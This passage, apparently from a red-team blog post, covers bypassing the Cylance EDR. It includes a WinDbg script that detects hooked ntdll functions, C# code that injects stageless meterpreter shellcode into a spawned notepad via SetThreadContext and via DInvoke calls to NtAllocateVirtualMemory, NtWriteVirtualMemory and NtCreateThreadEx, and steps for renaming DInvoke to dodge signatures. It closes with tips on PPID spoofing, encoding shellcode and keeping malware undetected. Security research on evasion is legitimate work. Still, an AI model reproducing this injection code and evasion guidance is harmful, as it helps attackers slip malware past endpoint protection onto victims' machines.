"ZwCreateJobSet", "ZwCreateKey", "ZwCreateKeyedEvent", "ZwCreateKeyTransacted", "ZwCreateLowBoxToken", "ZwCreateMailslotFile", "ZwCreateMutant", "ZwCreateNamedPipeFile", "ZwCreatePagingFile", "ZwCreatePartition", "ZwCreatePort", "ZwCreatePrivateNamespace", "ZwCreateProcess", "ZwCreateProcessEx", "ZwCreateProfile", "ZwCreateProfileEx", "ZwCreateResourceManager", "ZwCreateSection", "ZwCreateSemaphore", "ZwCreateSymbolicLinkObject", "ZwCreateThread", "ZwCreateThreadEx", "ZwCreateTimer", "ZwCreateTimer2", "ZwCreateToken", "ZwCreateTokenEx", "ZwCreateTransaction", "ZwCreateTransactionManager", "ZwCreateUserProcess", "ZwCreateWaitablePort", "ZwCreateWaitCompletionPacket", "ZwCreateWnfStateName", "ZwCreateWorkerFactory", "ZwDebugActiveProcess", "ZwDebugContinue", "ZwDelayExecution", "ZwDeleteAtom", "ZwDeleteBootEntry", "ZwDeleteDriverEntry", "ZwDeleteFile", "ZwDeleteKey", "ZwDeleteObjectAuditAlarm", "ZwDeletePrivateNamespace", "ZwDeleteValueKey", "ZwDeleteWnfStateData", "ZwDeleteWnfStateName", "ZwDeviceIoControlFile", "ZwDisableLastKnownGood", "ZwDisplayString", "ZwDrawText", "ZwDuplicateObject", "ZwDuplicateToken", "ZwEnableLastKnownGood", "ZwEnumerateBootEntries", "ZwEnumerateBus", "ZwEnumerateDriverEntries", "ZwEnumerateKey", "ZwEnumerateSystemEnvironmentValuesEx", "ZwEnumerateTransactionObject", "ZwEnumerateValueKey", "ZwExtendSection", "ZwFilterBootOption", "ZwFilterToken", "ZwFilterTokenEx", "ZwFindAtom", "ZwFlushBuffersFile", "ZwFlushBuffersFileEx", "ZwFlushInstallUILanguage", "ZwFlushInstructionCache", "ZwFlushKey", "ZwFlushProcessWriteBuffers", "ZwFlushVirtualMemory", "ZwFlushWriteBuffer", "ZwFreeUserPhysicalPages", "ZwFreeVirtualMemory", "ZwFreezeRegistry", "ZwFreezeTransactions", "ZwFsControlFile", "ZwGetCachedSigningLevel", "ZwGetCompleteWnfStateSubscription", "ZwGetContextThread", "ZwGetCurrentProcessorNumber", "ZwGetCurrentProcessorNumberEx", "ZwGetDevicePowerState", "ZwGetMUIRegistryInfo", "ZwGetNextProcess", "ZwGetNextThread", "ZwGetNlsSectionPtr", "ZwGetNotificationResourceManager", "ZwGetPlugPlayEvent", "ZwGetTickCount", "ZwGetWriteWatch", "ZwImpersonateAnonymousToken", "ZwImpersonateClientOfPort", "ZwImpersonateThread", "ZwInitializeNlsFiles", "ZwInitializeRegistry", "ZwInitializeVDM", "ZwInitiatePowerAction", "ZwIsProcessInJob", "ZwIsSystemResumeAutomatic", "ZwIsUILanguageComitted", "ZwListenChannel", "ZwListenPort", "ZwListTransactions", "ZwLoadDriver", "ZwLoadKey", "ZwLoadKey2", "ZwLoadKeyEx", "ZwLockFile", "ZwLockProductActivationKeys", "ZwLockRegistryKey", "ZwLockVirtualMemory", "ZwMakePermanentObject", "ZwMakeTemporaryObject", "ZwManagePartition", "ZwMapCMFModule", "ZwMapUserPhysicalPages", "ZwMapUserPhysicalPagesScatter", "ZwMapViewOfSection", "ZwMarshallTransaction", "ZwModifyBootEntry", "ZwModifyDriverEntry", "ZwNotifyChangeDirectoryFile", "ZwNotifyChangeKey", "ZwNotifyChangeMultipleKeys", "ZwNotifyChangeSession", "ZwOpenChannel", "ZwOpenDirectoryObject", "ZwOpenEnlistment", "ZwOpenEvent", "ZwOpenEventPair", "ZwOpenFile", "ZwOpenIoCompletion", "ZwOpenJobObject", "ZwOpenKey", "ZwOpenKeyedEvent", "ZwOpenKeyEx", "ZwOpenKeyTransacted", "ZwOpenKeyTransactedEx", "ZwOpenMutant", "ZwOpenObjectAuditAlarm", "ZwOpenPartition", "ZwOpenPrivateNamespace", "ZwOpenProcess", "ZwOpenProcessToken", "ZwOpenProcessTokenEx", "ZwOpenResourceManager", "ZwOpenSection", "ZwOpenSemaphore", "ZwOpenSession", "ZwOpenSymbolicLinkObject", "ZwOpenThread", "ZwOpenThreadToken", "ZwOpenThreadTokenEx", "ZwOpenTimer", "ZwOpenTransaction", "ZwOpenTransactionManager", "ZwPlugPlayControl", "ZwPowerInformation", "ZwPrepareComplete", "ZwPrepareEnlistment", "ZwPrePrepareComplete", "ZwPrePrepareEnlistment", "ZwPrivilegeCheck", "ZwPrivilegedServiceAuditAlarm", "ZwPrivilegeObjectAuditAlarm", "ZwPropagationComplete", "ZwPropagationFailed", "ZwProtectVirtualMemory", "ZwPullTransaction", "ZwPulseEvent", "ZwQueryAttributesFile", "ZwQueryBootEntryOrder", "ZwQueryBootOptions", "ZwQueryDebugFilterState", "ZwQueryDefaultLocale", "ZwQueryDefaultUILanguage", "ZwQueryDirectoryFile", "ZwQueryDirectoryObject", "ZwQueryDriverEntryOrder", "ZwQueryEaFile", "ZwQueryEvent", "ZwQueryFullAttributesFile", "ZwQueryInformationAtom", "ZwQueryInformationEnlistment", "ZwQueryInformationFile", "ZwQueryInformationJobObject", "ZwQueryInformationPort", "ZwQueryInformationProcess", "ZwQueryInformationResourceManager", "ZwQueryInformationThread", "ZwQueryInformationToken", "ZwQueryInformationTransaction", "ZwQueryInformationTransactionManager", "ZwQueryInformationWorkerFactory", "ZwQueryInstallUILanguage", "ZwQueryIntervalProfile", "ZwQueryIoCompletion", "ZwQueryKey", "ZwQueryLicenseValue", "ZwQueryMultipleValueKey", "ZwQueryMutant", "ZwQueryObject", "ZwQueryOleDirectoryFile", "ZwQueryOpenSubKeys", "ZwQueryOpenSubKeysEx", "ZwQueryPerformanceCounter", "ZwQueryPortInformationProcess", "ZwQueryQuotaInformationFile", "ZwQuerySection", "ZwQuerySecurityAttributesToken", "ZwQuerySecurityObject", "ZwQuerySemaphore", "ZwQuerySymbolicLinkObject", "ZwQuerySystemEnvironmentValue", "ZwQuerySystemEnvironmentValueEx", "ZwQuerySystemInformation", "ZwQuerySystemInformationEx", "ZwQuerySystemTime", "ZwQueryTimer", "ZwQueryTimerResolution", "ZwQueryValueKey", "ZwQueryVirtualMemory", "ZwQueryVolumeInformationFile", "ZwQueryWnfStateData", "ZwQueryWnfStateNameInformation", "ZwQueueApcThread", "ZwQueueApcThreadEx", "ZwRaiseException", "ZwRaiseHardError", "ZwReadFile", "ZwReadFileScatter", "ZwReadOnlyEnlistment", "ZwReadRequestData", "ZwReadVirtualMemory", "ZwRecoverEnlistment", "ZwRecoverResourceManager", "ZwRecoverTransactionManager", "ZwRegisterNewDevice", "ZwRegisterProtocolAddressInformation", "ZwRegisterThreadTerminatePort", "ZwReleaseCMFViewOwnership", "ZwReleaseKeyedEvent", "ZwReleaseMutant", "ZwReleaseProcessMutant", "ZwReleaseSemaphore", "ZwReleaseWorkerFactoryWorker", "ZwRemoveIoCompletion", "ZwRemoveIoCompletionEx", "ZwRemoveProcessDebug", "ZwRenameKey", "ZwRenameTransactionManager", "ZwRenameValueKey", "ZwReplaceKey", "ZwReplacePartitionUnit", "ZwReplyPort", "ZwReplyWaitReceivePort", "ZwReplyWaitReceivePortEx", "ZwReplyWaitReplyPort", "ZwReplyWaitSendChannel", "ZwRequestDeviceWakeup", "ZwRequestPort", "ZwRequestWaitReplyPort", "ZwRequestWakeupLatency", "ZwResetEvent", "ZwResetWriteWatch", "ZwRestoreKey", "ZwResumeProcess", "ZwResumeThread", "ZwRevertContainerImpersonation", "ZwRollbackComplete", "ZwRollbackEnlistment", "ZwRollbackSavepointTransaction", "ZwRollbackTransaction", "ZwRollforwardTransactionManager", "ZwSaveKey", "ZwSaveKeyEx", "ZwSaveMergedKeys", "ZwSavepointComplete", "ZwSavepointTransaction", "ZwSecureConnectPort", "ZwSendWaitReplyChannel", "ZwSerializeBoot", "ZwSetBootEntryOrder", "ZwSetBootOptions", "ZwSetCachedSigningLevel", "ZwSetContextChannel", "ZwSetContextThread", "ZwSetDebugFilterState", "ZwSetDefaultHardErrorPort", "ZwSetDefaultLocale", "ZwSetDefaultUILanguage", "ZwSetDriverEntryOrder", "ZwSetEaFile", "ZwSetEvent", "ZwSetEventBoostPriority", "ZwSetHighEventPair", "ZwSetHighWaitLowEventPair", "ZwSetHighWaitLowThread", "ZwSetInformationDebugObject", "ZwSetInformationEnlistment", "ZwSetInformationFile", "ZwSetInformationJobObject", "ZwSetInformationKey", "ZwSetInformationObject", "ZwSetInformationProcess", "ZwSetInformationResourceManager", "ZwSetInformationSymbolicLink", "ZwSetInformationThread", "ZwSetInformationToken", "ZwSetInformationTransaction", "ZwSetInformationTransactionManager", "ZwSetInformationVirtualMemory", "ZwSetInformationWorkerFactory", "ZwSetIntervalProfile", "ZwSetIoCompletion", "ZwSetIoCompletionEx", "ZwSetIRTimer", "ZwSetLdtEntries", "ZwSetLowEventPair", "ZwSetLowWaitHighEventPair", "ZwSetLowWaitHighThread", "ZwSetQuotaInformationFile", "ZwSetSecurityObject", "ZwSetSystemEnvironmentValue", "ZwSetSystemEnvironmentValueEx", "ZwSetSystemInformation", "ZwSetSystemPowerState", "ZwSetSystemTime", "ZwSetThreadExecutionState", "ZwSetTimer", "ZwSetTimer2", "ZwSetTimerEx", "ZwSetTimerResolution", "ZwSetUuidSeed", "ZwSetValueKey", "ZwSetVolumeInformationFile", "ZwSetWnfProcessNotificationEvent", "ZwShutdownSystem", "ZwShutdownWorkerFactory", "ZwSignalAndWaitForSingleObject", "ZwSinglePhaseReject", "ZwStartProfile", "ZwStartTm", "ZwStopProfile", "ZwSubscribeWnfStateChange", "ZwSuspendProcess", "ZwSuspendThread", "ZwSystemDebugControl", "ZwTerminateJobObject", "ZwTerminateProcess", "ZwTerminateThread", "ZwTestAlert", "ZwThawRegistry", "ZwThawTransactions", "ZwTraceControl", "ZwTraceEvent", "ZwTranslateFilePath", "ZwUmsThreadYield", "ZwUnloadDriver", "ZwUnloadKey", "ZwUnloadKey2", "ZwUnloadKeyEx", "ZwUnlockFile", "ZwUnlockVirtualMemory", "ZwUnmapViewOfSection", "ZwUnmapViewOfSectionEx", "ZwUnsubscribeWnfStateChange", "ZwUpdateWnfStateData", "ZwVdmControl", "ZwVdmStartExecution", "ZwW32Call", "ZwWaitForAlertByThreadId", "ZwWaitForDebugEvent", "ZwWaitForKeyedEvent", "ZwWaitForMultipleObjects", "ZwWaitForMultipleObjects32", "ZwWaitForProcessMutant", "ZwWaitForSingleObject", "ZwWaitForWnfNotifications", "ZwWaitForWorkViaWorkerFactory", "ZwWaitHighEventPair", "ZwWaitLowEventPair", "ZwWorkerFactoryWorkerReady", "ZwWow64AllocateVirtualMemory64", "ZwWow64CallFunction64", "ZwWow64CsrAllocateCaptureBuffer", "ZwWow64CsrAllocateMessagePointer", "ZwWow64CsrCaptureMessageBuffer", "ZwWow64CsrCaptureMessageString", "ZwWow64CsrClientCallServer", "ZwWow64CsrClientConnectToServer", "ZwWow64CsrFreeCaptureBuffer", "ZwWow64CsrGetProcessId", "ZwWow64CsrIdentifyAlertableThread", "ZwWow64CsrNewThread", "ZwWow64CsrSetPriorityClass", "ZwWow64CsrVerifyRegion", "ZwWow64DebuggerCall", "ZwWow64GetCurrentProcessorNumberEx", "ZwWow64GetNativeSystemInformation", "ZwWow64InterlockedPopEntrySList", "ZwWow64IsProcessorFeaturePresent", "ZwWow64QueryInformationProcess64", "ZwWow64QueryVirtualMemory64", "ZwWow64ReadVirtualMemory64", "ZwWow64WriteVirtualMemory64", "ZwWriteFile", "ZwWriteFileGather", "ZwWriteRequestData", "ZwWriteVirtualMemory", "ZwYieldExecution"];
var ctl = host.namespace.Debugger.Utility.Control;
var name = "C:\\Temp\\hooked_functions.txt"
var file = host.namespace.Debugger.Utility.FileSystem.CreateFile(name);
var textWriter = host.namespace.Debugger.Utility.FileSystem.CreateTextWriter(file);
host.diagnostics.debugLog("Checking hooks... \n");
for (var index = 0; index < functions.length; ++index) {
var func = functions[index];
try {
var output = ctl.ExecuteCommand("u " + func);
for (var line of output)
{
if (line.includes("CyMemDef64")){
host.diagnostics.debugLog(func + " hooked \n");
textWriter.WriteLine(func);
}
}
}
catch (e) {
// Do nothing
}
}
file.Close();
}
The script is quite simple, it is a loop around all the functions defined in the ntdll.dll (more than 2000 functions) which checks if the first instruction is a jmp to Cylance module (CyMemDef64). If it is, it means that the function is hooked. These are all the functions hooked:
If you want to save yourself some time, there is a good Github repository which already contains this information, not only for Cylance.
Now that we know about the API hooking, how can we bypass it?
Bypassing Cylance API hooking
One of the best resources you can check if you want to get introduced into bypassing API hooking is this blog post written by s3cur3th1ssh1t: A tale of EDR bypass methods.
In my case, I have used 2 different methods to bypass API hooking. Since I am writing most of my malware in C# these are the 2 methods I have used:
SharpUnhooker follows this process to unhook a dll:
- Map a fresh copy of ntdll.dll from disk to process memory
- Find virtual address of the .text section of the hooked ntdll.dll
- Find virtual address of the .text section of the freshly mapped ntdll.dll
- Get original memory protections of the hooked module’s .text section
- Copy .text section from the freshly mapped dll to the virtual address (found in step 3) of the original (hooked) ntdll.dll - this is the meat of the unhooking as all hooked bytes get overwritten with fresh ones from the disk
- Apply original memory protections to the freshly unhooked .text section of the original ntdll.dll
On the other hand, DInvoke can be used in multiple ways to bypass the API hooking. In short, with DInvoke rather than using PInvoke to import the API calls that we want to use, we load a DLL into memory manually. This can be done using different mechanisms defined in DInvoke. Then, we get a pointer to a function in that DLL. We may call that function from the pointer while passing in our parameters.
By leveraging this dynamic loading API rather than the static loading API that sits behind PInvoke, we avoid directly importing suspicious API calls into our .NET Assembly. Additionally, this API lets us easily invoke unmanaged code from memory in C# (passing in parameters and receiving output) without doing some hacky workaround like self-injecting shellcode.
Bypassing Cylance with SetThreadContext injection, PPID spoofing, SharpUnhooker and stageless meterpreter shellcode
In this bypass I will use SharpUnhooker, to get rid of Cylance API hooking. Once that is done, I will create a new process (notepad), get a handle of the main thread of that process and suspend its execution using SuspendThread. Code execution will then be achieved by exchanging the thread context using GetThreadContext and SetThreadContext such that the registers of the thread context points to the memory where I had previously loaded my shellcode. The shellcode used was encoded with a custom crypter and decoded during execution time with a custom substitution stub. I have used an stageless meterpreter shellcode. Why stageless? Because Cylance was detecting every time my meterpreter staged shellcode right when it was downloading the second stage payload.
This is a little extract of the code I used:
int tid = process.Threads[0].Id;
IntPtr hThread = IntPtr.Zero;
hThread = OpenThread(ThreadAccess.SUSPEND_RESUME | ThreadAccess.GET_CONTEXT | ThreadAccess.SET_CONTEXT, false, (uint)tid);
//Getting the thread context
CONTEXT64 context = new CONTEXT64();
context.ContextFlags = CONTEXT_FLAGS.CONTEXT_CONTROL;
bool success;
success = GetThreadContext(hThread, ref context);
if (success)
{
Console.WriteLine("GetThreadContext OK");
}
else
{
Console.WriteLine("GetThreadContext NOT OK");
}
//Modifying the context so the RIP register points to the previously written shellcode
context.Rip = (UInt64)pBaseAddr;
//Modifying the thread context
bool successSTC;
successSTC = SetThreadContext(hThread, ref context);
if (successSTC)
{
Console.WriteLine("SetThreadContext OK");
}
else
{
Console.WriteLine("SetThreadContext NOT OK");
}
//Starting the thread
ResumeThread(hThread);
//Closing the handle
CloseHandle(hThread);
I have had success previously bypassing Windows Defender using this technique. The key to bypass Defender was using PPID spoofing. Basically, if you create a notepad process using the standard procedure of going to startup>notepad that notepad process will always be a son of explorer.exe. Windows Defender does check that, and if you just create the notepad process from your malware, its parent process will not be explorer.exe and Defender will flag it as malware. So that is why I have used PPID spoofing, as it really makes sense that if Windows Defender checks that Cylance should probably at least do the same.
So, after using SharpUnhooker to get rid of API hooking, PPID spoofing using explorer.exe as the parent process of our created notepad process and SetThreadContext injection technique to inject our shellcode this is the result I got:
It worked! But was the PPID spoofing really necessary with Cylance? :>
Messing with Cylance
Now that we know that this method totally bypasses Cylance, what if we try to play with the parent process? What if we set Cylance Optics process as the parent process of our malicious notepad? It would definitely detect it… right?
It seems that Cylance is not really looking into this and relies heavily on its API hooking for the detections. Not a really good approach if you ask me. Knowing this, what if we try to perform the most simple process injection after bypassing API hooking and see if it gets detected?
Simple process injection & DInvoke
In this last demo I will bypass Cylance API hooking and then use the simplest process injection: Create process > allocate memory > write shellcode into the memory allocated > start a thread.
Taking into account that DInvoke has been around for a while, Cylance got some signatures against it and I had to modify some function names in DInvoke project and recompile it to get rid of the signature detection. These are the changes I did:
- Modified DInvoke including project name etc. to TTTa
- Removed all the comments in the source code
- Search and replace on the following strings in the whole project:
- DInvoke -> TTTa
- DynamicAPIInvoke -> DinaApiYnvo
- GetLibraryAddress -> JetLibAdre
- DynamicFunctionInvoke -> DinaFYnvo
- LoadModuleFromDisk -> LoMoFrDi
- GetLoadedModuleAddress -> JetLoaMoAdre
- GetPebLdrModuleEntry -> JetPebLdrModEntri
- GetExportAddress -> JetEspAdres
- GetNativeExportAddress -> JetNatEsporAdres
On the other hand, this is some of the code I used to perform the process injection:
TTTa.Data.PE.PE_MANUAL_MAP moduleDetails = TTTa.ManualMap.Map.MapModuleToMemory("C:\\Windows\\System32\\ntdll.dll");
var process = Process.Start(new ProcessStartInfo { Arguments = "", FileName = "C:\\Windows\\System32\\notepad.exe", WindowStyle = ProcessWindowStyle.Hidden });
var pid = (uint)process.Id;
IntPtr procHandle = IntPtr.Zero;
Data.Native.OBJECT_ATTRIBUTES oa = new Data.Native.OBJECT_ATTRIBUTES();
Data.Native.CLIENT_ID ci = new Data.Native.CLIENT_ID();
ci.UniqueProcess = (IntPtr)pid;
object[] parameters_NtOpenProcess = { procHandle, Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_ALL_ACCESS, oa, ci };
TTTa.DynamicInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "NtOpenProcess", typeof(DELEGATES.NtOpenProcess), parameters_NtOpenProcess, false);
procHandle = (IntPtr)parameters_NtOpenProcess[0];
IntPtr baseAddress = IntPtr.Zero;
UInt32 regionSize = (UInt32)dec.Length;
object[] parameters_NtAllocateVirtualMemory = { procHandle, baseAddress, (UInt32)0, regionSize, (UInt32)0x00001000 | (UInt32)0x00002000, (UInt32)0x04 };
TTTa.DynamicInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "NtAllocateVirtualMemory", typeof(DELEGATES.NtAllocateVirtualMemory), parameters_NtAllocateVirtualMemory, false);
baseAddress = (IntPtr) parameters_NtAllocateVirtualMemory[1];
UInt32 bufferLength = (UInt32)dec.Length;
object[] parameters_NtWriteVirtualMemory = { procHandle, baseAddress, Marshal.UnsafeAddrOfPinnedArrayElement(dec, 0), bufferLength, bufferLength };
TTTa.DynamicInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "NtWriteVirtualMemory", typeof(DELEGATES.NtWriteVirtualMemory), parameters_NtWriteVirtualMemory, false);
UInt32 oldProtect = (UInt32)0;
IntPtr regionSizePtr = (IntPtr)dec.Length;
object[] parameters_NtProtectVirtualMemory = { procHandle, baseAddress, regionSizePtr, (UInt32)0x20, oldProtect };
TTTa.DynamicInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "NtProtectVirtualMemory", typeof(DELEGATES.NtProtectVirtualMemory), parameters_NtProtectVirtualMemory, false);
IntPtr threadHeandle = IntPtr.Zero;
object[] parameters_NtCreateThreadEx = { threadHeandle, Data.Win32.WinNT.ACCESS_MASK.MAXIMUM_ALLOWED, IntPtr.Zero, procHandle, baseAddress, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero };
TTTa.DynamicInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "NtCreateThreadEx", typeof(DELEGATES.NtCreateThreadEx), parameters_NtCreateThreadEx, false);
Let’s see if this works against Cylance. Against Windows Defender, there is no need to say that this is obviously detected.
It worked once again! This proves once again that Cylance relies totally in its API hooking to perform this kind of detections. On the other hand, other EDRs were still able to detect me as they rely also on behavioral detection and ETW (Event Tracing for Windows).
Lessons learned
- Stageless shellcode is stealthier than staged (obviously the shellcode must be encoded). Most AVs/EDRs detect the malware when it downloads the second stage payload
- Encoding the shellcode with a crypter is always a must to avoid signature detection
- If you were thinking in executing the stageless shellcode from a PE resource that is not a good idea. This was really abused in the past and most AVs/EDRs will flag your malware if the PE resource file has a high entropy. Better embed your encoded shellcode in the program itself, even if your Visual Studio wants to explode asking for memory after that :>
- When using stubs, AVs/EDRs will always try to create signatures against them. If your stub is a switch block with more than 200 cases, how are they supposed to create a signature for that? Long stubs, from my experience, remain FUD longer than shorter stubs
- In my opinion, two of the stealthiest process injection techniques are SetThreadContext injection and APC queue code injection